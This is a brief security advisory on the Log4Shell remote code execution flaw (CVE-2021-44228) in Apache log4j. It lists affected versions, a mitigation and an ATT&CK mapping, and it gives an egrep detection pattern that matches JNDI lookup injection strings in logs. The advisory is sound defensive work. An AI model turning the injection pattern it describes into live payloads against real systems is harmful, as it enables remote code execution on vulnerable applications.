Get in Touch
0-day exploit found in log4j (Log4Shell)
Overview
A remote code execution (RCE) vulnerability CVE-2021-44228 has been found in popular Java logging library, log4j.
The exploit is an injection attack (like SQLi) which means any source of arbitrary data which is written to log files by an application using log4j is potentially vulnerable to RCE. Web Apps are of particular concern.
Impact
An unauthenticated remote attacker could execute code in the security context of the vulnerable app.
Affected Products
The vulnerable version of log4j is
2.0 <= Apache log4j <= 2.14.1
This is a popular package used by many other projects including Apache Struts2 and Minecraft servers.
Containment, Mitigations & Remediations
If it’s impractical to update, one mitigation mentioned on the GitHub issue is to remove the vulnerable class.
Indicators of Compromise
Security researcher Florian Roth has published some notes on detecting exploitation attempts, including a regular expression to search log sources.
`sudo egrep -i -r ‘\$\{jndi:(ldap[s]?|rmi)://[^\n]+’ /var/log`
Threat Landscape
log4j is a common library used in many enterprise Java applications. As such, it can be hard to predict what other apps will be found to contain a vulnerable version of the library in future.
This is an easily exploited RCE with a wide range of applicability which is likely to appeal to Ransomware groups.
Mitre Methodologies
T1190 – Exploit Public-Facing Application
Further Information
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package